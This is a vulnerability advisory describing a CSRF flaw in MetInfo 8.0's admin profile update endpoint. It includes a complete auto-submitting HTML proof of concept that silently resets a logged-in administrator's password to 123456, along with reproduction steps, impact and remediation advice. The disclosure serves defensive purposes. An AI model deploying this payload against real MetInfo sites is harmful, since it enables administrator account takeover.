CSRF Vulnerability in MetInfo 8.0 Allows Arbitrary Admin Password Change

CSRF Vulnerability in MetInfo 8.0 Allows Arbitrary Admin Password Change

Vulnerability Description

A Cross-Site Request Forgery (CSRF) vulnerability exists in MetInfo 8.0 that allows an attacker to change an administrator’s password without consent. By luring a logged-in admin to visit a crafted page, an auto-submitted POST request can update the admin profile password, resulting in account takeover.

Affected Product

  • Product: MetInfo CMS
  • Version: 8.0
  • Component: Admin Profile Update (/admin/?n=admin&c=index&a=doSaveInfo)
  • CWE: CWE-352: Cross-Site Request Forgery (CSRF)

Technical Details

The environment was set up locally using PHPStudy. Accessed the admin panel and navigated to the personal profile page to update the administrator password. The operation was intercepted and analyzed to assess CSRF protections. The password was changed from the original value to 123456 via the vulnerable endpoint.

Admin profile update interface:

Admin Profile Page

Generating a CSRF PoC from the captured request:

Generate CSRF PoC

Proof of Concept (PoC)

Save the following HTML as csrf2.html. When a logged-in admin visits the page, the form will auto-submit and change the admin password to 123456 without any user interaction.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://metlnfo/admin/?n=admin&c=index&a=doSaveInfo" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="admin_pass" value="123456" />
      <input type="hidden" name="admin_pass_replay" value="123456" />
      <input type="hidden" name="admin_name" value="fjl" />
      <input type="hidden" name="admin_mobile" value="1" />
      <input type="hidden" name="admin_email" value="1@qq.com" />
      <input type="hidden" name="submit_type" value="save" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
  </html>

Open the PoC in a browser (e.g., Edge) while logged into MetInfo as admin:

Open PoC

Submitting the request indicates success:

Request Success

Re-login verifies the password has been changed:

Re-login

Login Success

Impact

  • Type: Cross-Site Request Forgery (CSRF)
  • Who is impacted: Any authenticated administrator who can be tricked into visiting an attacker-controlled page
  • Consequences:
    1. Unauthorized password change leading to administrator account takeover
    2. Further compromise of the system by performing privileged actions

Remediation

To mitigate this issue, MetInfo should:

  1. Enforce robust CSRF protections: include unpredictable per-session/per-request tokens and validate them server-side
  2. Validate Origin/Referer headers for state-changing requests
  3. Require re-authentication (current password) for sensitive operations such as password changes
  4. Apply SameSite cookies and disable cross-site requests where appropriate

Timeline

  • 2025-10-05: Vulnerability documented and PoC prepared
  • [Future Date]: Vendor notified
  • [Future Date]: CVE requested/assigned